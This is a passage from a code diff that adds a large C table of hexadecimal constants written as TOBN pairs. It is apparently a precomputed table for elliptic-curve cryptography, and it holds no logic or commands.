+     TOBN(0xec0e15d4, 0x27d3317f), TOBN(0x8dfc1ddb, 0x1a64671e),
+     TOBN(0x93cc5d5f, 0xd49c5b92), TOBN(0xc995d53d, 0x3674a331),
+     TOBN(0x302e41ec, 0x090090ae), TOBN(0x2278a0cc, 0xedb06830),
+     TOBN(0x1d025932, 0xfbc99690), TOBN(0x0c32fbd2, 0xb80d68da),
+     TOBN(0xd79146da, 0xf341a6c1), TOBN(0xae0ba139, 0x1bef68a0),
+     TOBN(0xc6b8a563, 0x8d774b3a), TOBN(0x1cf307bd, 0x880ba4d7),
+     TOBN(0xc033bdc7, 0x19803511), TOBN(0xa9f97b3b, 0x8888c3be),
+     TOBN(0x3d68aebc, 0x85c6d05e), TOBN(0xc3b88a9d, 0x193919eb),
+     TOBN(0x2d300748, 0xc48b0ee3), TOBN(0x7506bc7c, 0x07a746c1),
+     TOBN(0xfc48437c, 0x6e6d57f3), TOBN(0x5bd71587, 0xcfeaa91a),
+     TOBN(0xa4ed0408, 0xc1bc5225), TOBN(0xd0b946db, 0x2719226d),
+     TOBN(0x109ecd62, 0x758d2d43), TOBN(0x75c8485a, 0x2751759b),
+     TOBN(0xb0b75f49, 0x9ce4177a), TOBN(0x4fa61a1e, 0x79c10c3d),
+     TOBN(0xc062d300, 0xa167fcd7), TOBN(0x4df3874c, 0x750f0fa8),
+     TOBN(0x29ae2cf9, 0x83dfedc9), TOBN(0xf8437134, 0x8d87631a),
+     TOBN(0xaf571711, 0x7429c8d2), TOBN(0x18d15867, 0x146d9272),
+     TOBN(0x83053ecf, 0x69769bb7), TOBN(0xc55eb856, 0xc479ab82),
+     TOBN(0x5ef7791c, 0x21b0f4b2), TOBN(0xaa5956ba, 0x3d491525),
+     TOBN(0x407a96c2, 0x9fe20eba), TOBN(0xf27168bb, 0xe52a5ad3),
+     TOBN(0x43b60ab3, 0xbf1d9d89), TOBN(0xe45c51ef, 0x710e727a),
+     TOBN(0xdfca5276, 0x099b4221), TOBN(0x8dc6407c, 0x2557a159),
+     TOBN(0x0ead8335, 0x91035895), TOBN(0x0a9db957, 0x9c55dc32),
+     TOBN(0xe40736d3, 0xdf61bc76), TOBN(0x13a619c0, 0x3f778cdb),
+     TOBN(0x6dd921a4, 0xc56ea28f), TOBN(0x76a52433, 0x2fa647b4),
+     TOBN(0x23591891, 0xac5bdc5d), TOBN(0xff4a1a72, 0xbac7dc01),
+     TOBN(0x9905e261, 0x62df8453), TOBN(0x3ac045df, 0xe63b265f),
+     TOBN(0x8a3f341b, 0xad53dba7), TOBN(0x8ec269cc, 0x837b625a),
+     TOBN(0xd71a2782, 0x3ae31189), TOBN(0x8fb4f9a3, 0x55e96120),
+     TOBN(0x804af823, 0xff9875cf), TOBN(0x23224f57, 0x5d442a9b),
+     TOBN(0x1c4d3b9e, 0xecc62679), TOBN(0x91da22fb, 0xa0e7ddb1),
+     TOBN(0xa370324d, 0x6c04a661), TOBN(0x9710d3b6, 0x5e376d17),
+     TOBN(0xed8c98f0, 0x3044e357), TOBN(0xc364ebbe, 0x6422701c),
+     TOBN(0x347f5d51, 0x7733d61c), TOBN(0xd55644b9, 0xcea826c3),
+     TOBN(0x80c6e0ad, 0x55a25548), TOBN(0x0aa7641d, 0x844220a7),
+     TOBN(0x1438ec81, 0x31810660), TOBN(0x9dfa6507, 0xde4b4043),
+     TOBN(0x10b515d8, 0xcc3e0273), TOBN(0x1b6066dd, 0x28d8cfb2),
+     TOBN(0xd3b04591, 0x9c9efebd), TOBN(0x425d4bdf, 0xa21c1ff4),
+     TOBN(0x5fe5af19, 0xd57607d3), TOBN(0xbbf773f7, 0x54481084),
+     TOBN(0x8435bd69, 0x94b03ed1), TOBN(0xd9ad1de3, 0x634cc546),
+     TOBN(0x2cf423fc, 0x00e420ca), TOBN(0xeed26d80, 0xa03096dd),
+     TOBN(0xd7f60be7, 0xa4db09d2), TOBN(0xf47f569d, 0x960622f7),
+     TOBN(0xe5925fd7, 0x7296c729), TOBN(0xeff2db26, 0x26ca2715),
+     TOBN(0xa6fcd014, 0xb913e759), TOBN(0x53da4786, 0x8ff4de93),
+     TOBN(0x14616d79, 0xc32068e1), TOBN(0xb187d664, 0xccdf352e),
+     TOBN(0xf7afb650, 0x1dc90b59), TOBN(0x8170e943, 0x7daa1b26),
+     TOBN(0xc8e3bdd8, 0x700c0a84), TOBN(0x6e8d345f, 0x6482bdfa),
+     TOBN(0x84cfbfa1, 0xc5c5ea50), TOBN(0xd3baf14c, 0x67960681),
+     TOBN(0x26398403, 0x0dd50942), TOBN(0xe4b7839c, 0x4716a663),
+     TOBN(0xd5f1f794, 0xe7de6dc0), TOBN(0x5cd0f4d4, 0x622aa7ce),
+     TOBN(0x5295f3f1, 0x59acfeec), TOBN(0x8d933552, 0x953e0607),
+     TOBN(0xc7db8ec5, 0x776c5722), TOBN(0xdc467e62, 0x2b5f290c),
+     TOBN(0xd4297e70, 0x4ff425a9), TOBN(0x4be924c1, 0x0cf7bb72),
+     TOBN(0x0d5dc5ae, 0xa1892131), TOBN(0x8bf8a8e3, 0xa705c992),
+     TOBN(0x73a0b064, 0x7a305ac5), TOBN(0x00c9ca4e, 0x9a8c77a8),
+     TOBN(0x5dfee80f, 0x83774bdd), TOBN(0x63131602, 0x85734485),
+     TOBN(0xa1b524ae, 0x914a69a9), TOBN(0xebc2ffaf, 0xd4e300d7),
+     TOBN(0x52c93db7, 0x7cfa46a5), TOBN(0x71e6161f, 0x21653b50),
+     TOBN(0x3574fc57, 0xa4bc580a), TOBN(0xc09015dd, 0xe1bc1253),
+     TOBN(0x4b7b47b2, 0xd174d7aa), TOBN(0x4072d8e8, 0xf3a15d04),
+     TOBN(0xeeb7d47f, 0xd6fa07ed), TOBN(0x6f2b9ff9, 0xedbdafb1),
+     TOBN(0x18c51615, 0x3760fe8a), TOBN(0x7a96e6bf, 0xf06c6c13),
+     TOBN(0x4d7a0410, 0x0ea2d071), TOBN(0xa1914e9b, 0x0be2a5ce),
+     TOBN(0x5726e357, 0xd8a3c5cf), TOBN(0x1197ecc3, 0x2abb2b13),
+     TOBN(0x6c0d7f7f, 0x31ae88dd), TOBN(0x15b20d1a, 0xfdbb3efe),
+     TOBN(0xcd06aa26, 0x70584039), TOBN(0x2277c969, 0xa7dc9747),
+     TOBN(0xbca69587, 0x7855d815), TOBN(0x899ea238, 0x5188b32a),
+     TOBN(0x37d9228b, 0x760c1c9d), TOBN(0xc7efbb11, 0x9b5c18da),
+     TOBN(0x7f0d1bc8, 0x19f6dbc5), TOBN(0x4875384b, 0x07e6905b),
+     TOBN(0xc7c50baa, 0x3ba8cd86), TOBN(0xb0ce40fb, 0xc2905de0),
+     TOBN(0x70840673, 0x7a231952), TOBN(0xa912a262, 0xcf43de26),
+     TOBN(0x9c38ddcc, 0xeb5b76c1), TOBN(0x746f5285, 0x26fc0ab4),
+     TOBN(0x52a63a50, 0xd62c269f), TOBN(0x60049c55, 0x99458621),
+     TOBN(0xe7f48f82, 0x3c2f7c9e), TOBN(0x6bd99043, 0x917d5cf3),
+     TOBN(0xeb1317a8, 0x8701f469), TOBN(0xbd3fe2ed, 0x9a449fe0),
+     TOBN(0x421e79ca, 0x12ef3d36), TOBN(0x9ee3c36c, 0x3e7ea5de),
+     TOBN(0xe48198b5, 0xcdff36f7), TOBN(0xaff4f967, 0xc6b82228),
+     TOBN(0x15e19dd0, 0xc47adb7e), TOBN(0x45699b23, 0x032e7dfa),
+     TOBN(0x40680c8b, 0x1fae026a), TOBN(0x5a347a48, 0x550dbf4d),
+     TOBN(0xe652533b, 0x3cef0d7d), TOBN(0xd94f7b18, 0x2bbb4381),
+     TOBN(0x838752be, 0x0e80f500), TOBN(0x8e6e2488, 0x9e9c9bfb),
+     TOBN(0xc9751697, 0x16caca6a), TOBN(0x866c49d8, 0x38531ad9),
+     TOBN(0xc917e239, 0x7151ade1), TOBN(0x2d016ec1, 0x6037c407),
+     TOBN(0xa407ccc9, 0x00eac3f9), TOBN(0x835f6280, 0xe2ed4748),
+     TOBN(0xcc54c347, 0x1cc98e0d), TOBN(0x0e969937, 0xdcb572eb),
+     TOBN(0x1b16c8e8, 0x8f30c9cb), TOBN(0xa606ae75, 0x373c4661),
+     TOBN(0x47aa689b, 0x35502cab), TOBN(0xf89014ae, 0x4d9bb64f),
+     TOBN(0x202f6a9c, 0x31c71f7b), TOBN(0x01f95aa3, 0x296ffe5c),
+     TOBN(0x5fc06014, 0x53cec3a3), TOBN(0xeb991237, 0x5f498a45),
+     TOBN(0xae9a935e, 0x5d91ba87), TOBN(0xc6ac6281, 0x0b564a19),
+     TOBN(0x8a8fe81c, 0x3bd44e69), TOBN(0x7c8b467f, 0x9dd11d45),
+     TOBN(0xf772251f, 0xea5b8e69), TOBN(0xaeecb3bd, 0xc5b75fbc),
+     TOBN(0x1aca3331, 0x887ff0e5), TOBN(0xbe5d49ff, 0x19f0a131),
+     TOBN(0x582c13aa, 0xe5c8646f), TOBN(0xdbaa12e8, 0x20e19980),
+     TOBN(0x8f40f31a, 0xf7abbd94), TOBN(0x1f13f5a8, 0x1dfc7663),
+     TOBN(0x5d81f1ee, 0xaceb4fc0), TOBN(0x36256002, 0x5e6f0f42),
+     TOBN(0x4b67d6d7, 0x751370c8), TOBN(0x2608b698, 0x03e80589),
+     TOBN(0xcfc0d2fc, 0x05268301), TOBN(0xa6943d39, 0x40309212),
+     TOBN(0x192a90c2, 0x1fd0e1c2), TOBN(0xb209f113, 0x37f1dc76),
+     TOBN(0xefcc5e06, 0x97bf1298), TOBN(0xcbdb6730, 0x219d639e),
+     TOBN(0xd009c116, 0xb81e8c6f), TOBN(0xa3ffdde3, 0x1a7ce2e5),
+     TOBN(0xc53fbaaa, 0xa914d3ba), TOBN(0x836d500f, 0x88df85ee),
+     TOBN(0xd98dc71b, 0x66ee0751), TOBN(0x5a3d7005, 0x714516fd),
+     TOBN(0x21d3634d, 0x39eedbba), TOBN(0x35cd2e68, 0x0455a46d),
+     TOBN(0xc8cafe65, 0xf9d7eb0c), TOBN(0xbda3ce9e, 0x00cefb3e),
+     TOBN(0xddc17a60, 0x2c9cf7a4), TOBN(0x01572ee4, 0x7bcb8773),
+     TOBN(0xa92b2b01, 0x8c7548df), TOBN(0x732fd309, 0xa84600e3),
+     TOBN(0xe22109c7, 0x16543a40), TOBN(0x9acafd36, 0xfede3c6c),
+     TOBN(0xfb206852, 0x6824e614), TOBN(0x2a4544a9, 0xda25dca0),
+     TOBN(0x25985262, 0x91d60b06), TOBN(0x281b7be9, 0x28753545),
+     TOBN(0xec667b1a, 0x90f13b27), TOBN(0x33a83aff, 0x940e2eb4),
+     TOBN(0x80009862, 0xd5d721d5), TOBN(0x0c3357a3, 0x5bd3a182),
+     TOBN(0x27f3a83b, 0x7aa2cda4), TOBN(0xb58ae74e, 0xf6f83085),
+     TOBN(0x2a911a81, 0x2e6dad6b), TOBN(0xde286051, 0xf43d6c5b),
+     TOBN(0x4bdccc41, 0xf996c4d8), TOBN(0xe7312ec0, 0x0ae1e24e)}
+    ,
+    {TOBN(0xf8d112e7, 0x6e6485b3), TOBN(0x4d3e24db, 0x771c52f8),
+     TOBN(0x48e3ee41, 0x684a2f6d), TOBN(0x7161957d, 0x21d95551),
+     TOBN(0x19631283, 0xcdb12a6c), TOBN(0xbf3fa882, 0x2e50e164),
+     TOBN(0xf6254b63, 0x3166cc73), TOBN(0x3aefa7ae, 0xaee8cc38),
+     TOBN(0x79b0fe62, 0x3b36f9fd), TOBN(0x26543b23, 0xfde19fc0),
+     TOBN(0x136e64a0, 0x958482ef), TOBN(0x23f63771, 0x9b095825),
+     TOBN(0x14cfd596, 0xb6a1142e), TOBN(0x5ea6aac6, 0x335aac0b),
+     TOBN(0x86a0e8bd, 0xf3081dd5), TOBN(0x5fb89d79, 0x003dc12a),
+     TOBN(0xf615c33a, 0xf72e34d4), TOBN(0x0bd9ea40, 0x110eec35),
+     TOBN(0x1c12bc5b, 0xc1dea34e), TOBN(0x686584c9, 0x49ae4699),
+     TOBN(0x13ad95d3, 0x8c97b942), TOBN(0x4609561a, 0x4e5c7562),
+     TOBN(0x9e94a4ae, 0xf2737f89), TOBN(0xf57594c6, 0x371c78b6),
+     TOBN(0x0f0165fc, 0xe3779ee3), TOBN(0xe00e7f9d, 0xbd495d9e),
+     TOBN(0x1fa4efa2, 0x20284e7a), TOBN(0x4564bade, 0x47ac6219),
+     TOBN(0x90e6312a, 0xc4708e8e), TOBN(0x4f5725fb, 0xa71e9adf),
+     TOBN(0xe95f55ae, 0x3d684b9f), TOBN(0x47f7ccb1, 0x1e94b415),
+     TOBN(0x7322851b, 0x8d946581), TOBN(0xf0d13133, 0xbdf4a012),
+     TOBN(0xa3510f69, 0x6584dae0), TOBN(0x03a7c171, 0x3c9f6c6d),
+     TOBN(0x5be97f38, 0xe475381a), TOBN(0xca1ba422, 0x85823334),
+     TOBN(0xf83cc5c7, 0x0be17dda), TOBN(0x158b1494, 0x0b918c0f),
+     TOBN(0xda3a77e5, 0x522e6b69), TOBN(0x69c908c3, 0xbbcd6c18),
+     TOBN(0x1f1b9e48, 0xd924fd56), TOBN(0x37c64e36, 0xaa4bb3f7),
+     TOBN(0x5a4fdbdf, 0xee478d7d), TOBN(0xba75c8bc, 0x0193f7a0),
+     TOBN(0x84bc1e84, 0x56cd16df), TOBN(0x1fb08f08, 0x46fad151),
+     TOBN(0x8a7cabf9, 0x842e9f30), TOBN(0xa331d4bf, 0x5eab83af),
+     TOBN(0xd272cfba, 0x017f2a6a), TOBN(0x27560abc, 0x83aba0e3),
+     TOBN(0x94b83387, 0x0e3a6b75), TOBN(0x25c6aea2, 0x6b9f50f5),
+     TOBN(0x803d691d, 0xb5fdf6d0), TOBN(0x03b77509, 0xe6333514),
+     TOBN(0x36178903, 0x61a341c1), TOBN(0x3604dc60, 0x0cfd6142),
+     TOBN(0x022295eb, 0x8533316c), TOBN(0x3dbde4ac, 0x44af2922),
+     TOBN(0x898afc5d, 0x1c7eef69), TOBN(0x58896805, 0xd14f4fa1),
+     TOBN(0x05002160, 0x203c21ca), TOBN(0x6f0d1f30, 0x40ef730b),
+     TOBN(0x8e8c44d4, 0x196224f8), TOBN(0x75a4ab95, 0x374d079d),
+     TOBN(0x79085ecc, 0x7d48f123), TOBN(0x56f04d31, 0x1bf65ad8),
+     TOBN(0xe220bf1c, 0xbda602b2), TOBN(0x73ee1742, 0xf9612c69),
+     TOBN(0x76008fc8, 0x084fd06b), TOBN(0x4000ef9f, 0xf11380d1),
+     TOBN(0x48201b4b, 0x12cfe297), TOBN(0x3eee129c, 0x292f74e5),
+     TOBN(0xe1fe114e, 0xc9e874e8), TOBN(0x899b055c, 0x92c5fc41),
+     TOBN(0x4e477a64, 0x3a39c8cf), TOBN(0x82f09efe, 0x78963cc9),
+     TOBN(0x6fd3fd8f, 0xd333f863), TOBN(0x85132b2a, 0xdc949c63),
+     TOBN(0x7e06a3ab, 0x516eb17b), TOBN(0x73bec06f, 0xd2c7372b),
+     TOBN(0xe4f74f55, 0xba896da6), TOBN(0xbb4afef8, 0x8e9eb40f),
+     TOBN(0x2d75bec8, 0xe61d66b0), TOBN(0x02bda4b4, 0xef29300b),
+     TOBN(0x8bbaa8de, 0x026baa5a), TOBN(0xff54befd, 0xa07f4440),
+     TOBN(0xbd9b8b1d, 0xbe7a2af3), TOBN(0xec51caa9, 0x4fb74a72),
+     TOBN(0xb9937a4b, 0x63879697), TOBN(0x7c9a9d20, 0xec2687d5),
+     TOBN(0x1773e44f, 0x6ef5f014), TOBN(0x8abcf412, 0xe90c6900),
+     TOBN(0x387bd022, 0x8142161e), TOBN(0x50393755, 0xfcb6ff2a),
+     TOBN(0x9813fd56, 0xed6def63), TOBN(0x53cf6482, 0x7d53106c),
+     TOBN(0x991a35bd, 0x431f7ac1), TOBN(0xf1e274dd, 0x63e65faf),
+     TOBN(0xf63ffa3c, 0x44cc7880), TOBN(0x411a426b, 0x7c256981),
+     TOBN(0xb698b9fd, 0x93a420e0), TOBN(0x89fdddc0, 0xae53f8fe),
+     TOBN(0x766e0722, 0x32398baa), TOBN(0x205fee42, 0x5cfca031),
+     TOBN(0xa49f5341, 0x7a029cf2), TOBN(0xa88c68b8, 0x4023890d),
+     TOBN(0xbc275041, 0x7337aaa8), TOBN(0x9ed364ad, 0x0eb384f4),
+     TOBN(0xe0816f85, 0x29aba92f), TOBN(0x2e9e1941, 0x04e38a88),
+     TOBN(0x57eef44a, 0x3dafd2d5), TOBN(0x35d1fae5, 0x97ed98d8),
+     TOBN(0x50628c09, 0x2307f9b1), TOBN(0x09d84aae, 0xd6cba5c6),
+     TOBN(0x67071bc7, 0x88aaa691), TOBN(0x2dea57a9, 0xafe6cb03),
+     TOBN(0xdfe11bb4, 0x3d78ac01), TOBN(0x7286418c, 0x7fd7aa51),
+     TOBN(0xfabf7709, 0x77f7195a), TOBN(0x8ec86167, 0xadeb838f),
+     TOBN(0xea1285a8, 0xbb4f012d), TOBN(0xd6883503, 0x9a3eab3f),
+     TOBN(0xee5d24f8, 0x309004c2), TOBN(0xa96e4b76, 0x13ffe95e),
+     TOBN(0x0cdffe12, 0xbd223ea4), TOBN(0x8f5c2ee5, 0xb6739a53),
+     TOBN(0x5cb4aaa5, 0xdd968198), TOBN(0xfa131c52, 0x72413a6c),
+     TOBN(0x53d46a90, 0x9536d903), TOBN(0xb270f0d3, 0x48606d8e),
+     TOBN(0x518c7564, 0xa053a3bc), TOBN(0x088254b7, 0x1a86caef),
+     TOBN(0xb3ba8cb4, 0x0ab5efd0), TOBN(0x5c59900e, 0x4605945d),
+     TOBN(0xecace1dd, 0xa1887395), TOBN(0x40960f36, 0x932a65de),
+     TOBN(0x9611ff5c, 0x3aa95529), TOBN(0xc58215b0, 0x7c1e5a36),
+     TOBN(0xd48c9b58, 0xf0e1a524), TOBN(0xb406856b, 0xf590dfb8),
+     TOBN(0xc7605e04, 0x9cd95662), TOBN(0x0dd036ee, 0xa33ecf82),
+     TOBN(0xa50171ac, 0xc33156b3), TOBN(0xf09d24ea, 0x4a80172e),
+     TOBN(0x4e1f72c6, 0x76dc8eef), TOBN(0xe60caadc, 0x5e3d44ee),
+     TOBN(0x006ef8a6, 0x979b1d8f), TOBN(0x60908a1c, 0x97788d26),
+     TOBN(0x6e08f95b, 0x266feec0), TOBN(0x618427c2, 0x22e8c94e),
+     TOBN(0x3d613339, 0x59145a65), TOBN(0xcd9bc368, 0xfa406337),
+     TOBN(0x82d11be3, 0x2d8a52a0), TOBN(0xf6877b27, 0x97a1c590),
+     TOBN(0x837a819b, 0xf5cbdb25), TOBN(0x2a4fd1d8, 0xde090249),
+     TOBN(0x622a7de7, 0x74990e5f), TOBN(0x840fa5a0, 0x7945511b),
+     TOBN(0x30b974be, 0x6558842d), TOBN(0x70df8c64, 0x17f3d0a6),
+     TOBN(0x7c803520, 0x7542e46d), TOBN(0x7251fe7f, 0xe4ecc823),
+     TOBN(0xe59134cb, 0x5e9aac9a), TOBN(0x11bb0934, 0xf0045d71),
+     TOBN(0x53e5d9b5, 0xdbcb1d4e), TOBN(0x8d97a905, 0x92defc91),
+     TOBN(0xfe289327, 0x7946d3f9), TOBN(0xe132bd24, 0x07472273),
+     TOBN(0xeeeb510c, 0x1eb6ae86), TOBN(0x777708c5, 0xf0595067),
+     TOBN(0x18e2c8cd, 0x1297029e), TOBN(0x2c61095c, 0xbbf9305e),
+     TOBN(0xe466c258, 0x6b85d6d9), TOBN(0x8ac06c36, 0xda1ea530),
+     TOBN(0xa365dc39, 0xa1304668), TOBN(0xe4a9c885, 0x07f89606),
+     TOBN(0x65a4898f, 0xacc7228d), TOBN(0x3e2347ff, 0x84ca8303),
+     TOBN(0xa5f6fb77, 0xea7d23a3), TOBN(0x2fac257d, 0x672a71cd),
+     TOBN(0x6908bef8, 0x7e6a44d3), TOBN(0x8ff87566, 0x891d3d7a),
+     TOBN(0xe58e90b3, 0x6b0cf82e), TOBN(0x6438d246, 0x2615b5e7),
+     TOBN(0x07b1f8fc, 0x669c145a), TOBN(0xb0d8b2da, 0x36f1e1cb),
+     TOBN(0x54d5dadb, 0xd9184c4d), TOBN(0x3dbb18d5, 0xf93d9976),
+     TOBN(0x0a3e0f56, 0xd1147d47), TOBN(0x2afa8c8d, 0xa0a48609),
+     TOBN(0x275353e8, 0xbc36742c), TOBN(0x898f427e, 0xeea0ed90),
+     TOBN(0x26f4947e, 0x3e477b00), TOBN(0x8ad8848a, 0x308741e3),
+     TOBN(0x6c703c38, 0xd74a2a46), TOBN(0x5e3e05a9, 0x9ba17ba2),
+     TOBN(0xc1fa6f66, 0x4ab9a9e4), TOBN(0x474a2d9a, 0x3841d6ec),
+     TOBN(0x871239ad, 0x653ae326), TOBN(0x14bcf72a, 0xa74cbb43),
+     TOBN(0x8737650e, 0x20d4c083), TOBN(0x3df86536, 0x110ed4af),
+     TOBN(0xd2d86fe7, 0xb53ca555), TOBN(0x688cb00d, 0xabd5d538),
+     TOBN(0xcf81bda3, 0x1ad38468), TOBN(0x7ccfe3cc, 0xf01167b6),
+     TOBN(0xcf4f47e0, 0x6c4c1fe6), TOBN(0x557e1f1a, 0x298bbb79),
+     TOBN(0xf93b974f, 0x30d45a14), TOBN(0x174a1d2d, 0x0baf97c4),
+     TOBN(0x7a003b30, 0xc51fbf53), TOBN(0xd8940991, 0xee68b225),
+     TOBN(0x5b0aa7b7, 0x1c0f4173), TOBN(0x975797c9, 0xa20a7153),
+     TOBN(0x26e08c07, 0xe3533d77), TOBN(0xd7222e6a, 0x2e341c99),
+     TOBN(0x9d60ec3d, 0x8d2dc4ed), TOBN(0xbdfe0d8f, 0x7c476cf8),
+     TOBN(0x1fe59ab6, 0x1d056605), TOBN(0xa9ea9df6, 0x86a8551f),
+     TOBN(0x8489941e, 0x47fb8d8c), TOBN(0xfeb874eb, 0x4a7f1b10),
+     TOBN(0xfe5fea86, 0x7ee0d98f), TOBN(0x201ad34b, 0xdbf61864),
+     TOBN(0x45d8fe47, 0x37c031d4), TOBN(0xd5f49fae, 0x795f0822),
+     TOBN(0xdb0fb291, 0xc7f4a40c), TOBN(0x2e69d9c1, 0x730ddd92),
+     TOBN(0x754e1054, 0x49d76987), TOBN(0x8a24911d, 0x7662db87),
+     TOBN(0x61fc1810, 0x60a71676), TOBN(0xe852d1a8, 0xf66a8ad1),
+     TOBN(0x172bbd65, 0x6417231e), TOBN(0x0d6de7bd, 0x3babb11f),
+     TOBN(0x6fde6f88, 0xc8e347f8), TOBN(0x1c587547, 0x9bd99cc3),
+     TOBN(0x78e54ed0, 0x34076950), TOBN(0x97f0f334, 0x796e83ba),
+     TOBN(0xe4dbe1ce, 0x4924867a), TOBN(0xbd5f51b0, 0x60b84917),
+     TOBN(0x37530040, 0x3cb09a79), TOBN(0xdb3fe0f8, 0xff1743d8),
+     TOBN(0xed7894d8, 0x556fa9db), TOBN(0xfa262169, 0x23412fbf),
+     TOBN(0x563be0db, 0xba7b9291), TOBN(0x6ca8b8c0, 0x0c9fb234),
+     TOBN(0xed406aa9, 0xbd763802), TOBN(0xc21486a0, 0x65303da1),
+     TOBN(0x61ae291e, 0xc7e62ec4), TOBN(0x622a0492, 0xdf99333e),
+     TOBN(0x7fd80c9d, 0xbb7a8ee0), TOBN(0xdc2ed3bc, 0x6c01aedb),
+     TOBN(0x35c35a12, 0x08be74ec), TOBN(0xd540cb1a, 0x469f671f),
+     TOBN(0xd16ced4e, 0xcf84f6c7), TOBN(0x8561fb9c, 0x2d090f43),
+     TOBN(0x7e693d79, 0x6f239db4), TOBN(0xa736f928, 0x77bd0d94),
+     TOBN(0x07b4d929, 0x2c1950ee), TOBN(0xda177543, 0x56dc11b3),
+     TOBN(0xa5dfbbaa, 0x7a6a878e), TOBN(0x1c70cb29, 0x4decb08a),
+     TOBN(0xfba28c8b, 0x6f0f7c50), TOBN(0xa8eba2b8, 0x854dcc6d),
+     TOBN(0x5ff8e89a, 0x36b78642), TOBN(0x070c1c8e, 0xf6873adf),
+     TOBN(0xbbd3c371, 0x6484d2e4), TOBN(0xfb78318f, 0x0d414129),
+     TOBN(0x2621a39c, 0x6ad93b0b), TOBN(0x979d74c2, 0xa9e917f7),
+     TOBN(0xfc195647, 0x61fb0428), TOBN(0x4d78954a, 0xbee624d4),
+     TOBN(0xb94896e0, 0xb8ae86fd), TOBN(0x6667ac0c, 0xc91c8b13),
+     TOBN(0x9f180512, 0x43bcf832), TOBN(0xfbadf8b7, 0xa0010137),
+     TOBN(0xc69b4089, 0xb3ba8aa7), TOBN(0xfac4bacd, 0xe687ce85),
+     TOBN(0x9164088d, 0x977eab40), TOBN(0x51f4c5b6, 0x2760b390),
+     TOBN(0xd238238f, 0x340dd553), TOBN(0x358566c3, 0xdb1d31c9),
+     TOBN(0x3a5ad69e, 0x5068f5ff), TOBN(0xf31435fc, 0xdaff6b06),
+     TOBN(0xae549a5b, 0xd6debff0), TOBN(0x59e5f0b7, 0x75e01331),
+     TOBN(0x5d492fb8, 0x98559acf), TOBN(0x96018c2e, 0x4db79b50),
+     TOBN(0x55f4a48f, 0x609f66aa), TOBN(0x1943b3af, 0x4900a14f),
+     TOBN(0xc22496df, 0x15a40d39), TOBN(0xb2a44684, 0x4c20f7c5),
+     TOBN(0x76a35afa, 0x3b98404c), TOBN(0xbec75725, 0xff5d1b77),
+     TOBN(0xb67aa163, 0xbea06444), TOBN(0x27e95bb2, 0xf724b6f2),
+     TOBN(0x3c20e3e9, 0xd238c8ab), TOBN(0x1213754e, 0xddd6ae17),
+     TOBN(0x8c431020, 0x716e0f74), TOBN(0x6679c82e, 0xffc095c2),
+     TOBN(0x2eb3adf4, 0xd0ac2932), TOBN(0x2cc970d3, 0x01bb7a76),
+     TOBN(0x70c71f2f, 0x740f0e66), TOBN(0x545c616b, 0x2b6b23cc),
+     TOBN(0x4528cfcb, 0xb40a8bd7), TOBN(0xff839633, 0x2ab27722),
+     TOBN(0x049127d9, 0x025ac99a), TOBN(0xd314d4a0, 0x2b63e33b),
+     TOBN(0xc8c310e7, 0x28d84519), TOBN(0x0fcb8983, 0xb3bc84ba),
+     TOBN(0x2cc52261, 0x38634818), TOBN(0x501814f4, 0xb44c2e0b),
+     TOBN(0xf7e181aa, 0x54dfdba3), TOBN(0xcfd58ff0, 0xe759718c),
+     TOBN(0xf90cdb14, 0xd3b507a8), TOBN(0x57bd478e, 0xc50bdad8),
+     TOBN(0x29c197e2, 0x50e5f9aa), TOBN(0x4db6eef8, 0xe40bc855),
+     TOBN(0x2cc8f21a, 0xd1fc0654), TOBN(0xc71cc963, 0x81269d73),
+     TOBN(0xecfbb204, 0x077f49f9), TOBN(0xdde92571, 0xca56b793),
+     TOBN(0x9abed6a3, 0xf97ad8f7), TOBN(0xe6c19d3f, 0x924de3bd),
+     TOBN(0x8dce92f4, 0xa140a800), TOBN(0x85f44d1e, 0x1337af07),
+     TOBN(0x5953c08b, 0x09d64c52), TOBN(0xa1b5e49f, 0xf5df9749),
+     TOBN(0x336a8fb8, 0x52735f7d), TOBN(0xb332b6db, 0x9add676b),
+     TOBN(0x558b88a0, 0xb4511aa4), TOBN(0x09788752, 0xdbd5cc55),
+     TOBN(0x16b43b9c, 0xd8cd52bd), TOBN(0x7f0bc5a0, 0xc2a2696b),
+     TOBN(0x146e12d4, 0xc11f61ef), TOBN(0x9ce10754, 0x3a83e79e),
+     TOBN(0x08ec73d9, 0x6cbfca15), TOBN(0x09ff29ad, 0x5b49653f),
+     TOBN(0xe31b72bd, 0xe7da946e), TOBN(0xebf9eb3b, 0xee80a4f2),
+     TOBN(0xd1aabd08, 0x17598ce4), TOBN(0x18b5fef4, 0x53f37e80),
+     TOBN(0xd5d5cdd3, 0x5958cd79), TOBN(0x3580a1b5, 0x1d373114),
+     TOBN(0xa36e4c91, 0xfa935726), TOBN(0xa38c534d, 0xef20d760),
+     TOBN(0x7088e40a, 0x2ff5845b), TOBN(0xe5bb40bd, 0xbd78177f),
+     TOBN(0x4f06a7a8, 0x857f9920), TOBN(0xe3cc3e50, 0xe968f05d),
+     TOBN(0x1d68b7fe, 0xe5682d26), TOBN(0x5206f76f, 0xaec7f87c),
+     TOBN(0x41110530, 0x041951ab), TOBN(0x58ec52c1, 0xd4b5a71a),
+     TOBN(0xf3488f99, 0x0f75cf9a), TOBN(0xf411951f, 0xba82d0d5),
+     TOBN(0x27ee75be, 0x618895ab), TOBN(0xeae060d4, 0x6d8aab14),
+     TOBN(0x9ae1df73, 0x7fb54dc2), TOBN(0x1f3e391b, 0x25963649),
+     TOBN(0x242ec32a, 0xfe055081), TOBN(0x5bd450ef, 0x8491c9bd),
+     TOBN(0x367efc67, 0x981eb389), TOBN(0xed7e1928, 0x3a0550d5),
+     TOBN(0x362e776b, 0xab3ce75c), TOBN(0xe890e308, 0x1f24c523),
+     TOBN(0xb961b682, 0xfeccef76), TOBN(0x8b8e11f5, 0x8bba6d92),
+     TOBN(0x8f2ccc4c, 0x2b2375c4), TOBN(0x0d7f7a52, 0xe2f86cfa),
+     TOBN(0xfd94d30a, 0x9efe5633), TOBN(0x2d8d246b, 0x5451f934),
+     TOBN(0x2234c6e3, 0x244e6a00), TOBN(0xde2b5b0d, 0xddec8c50),
+     TOBN(0x2ce53c5a, 0xbf776f5b), TOBN(0x6f724071, 0x60357b05),
+     TOBN(0xb2593717, 0x71bf3f7a), TOBN(0x87d2501c, 0x440c4a9f),
+     TOBN(0x440552e1, 0x87b05340), TOBN(0xb7bf7cc8, 0x21624c32),
+     TOBN(0x4155a6ce, 0x22facddb), TOBN(0x5a4228cb, 0x889837ef),
+     TOBN(0xef87d6d6, 0xfd4fd671), TOBN(0xa233687e, 0xc2daa10e),
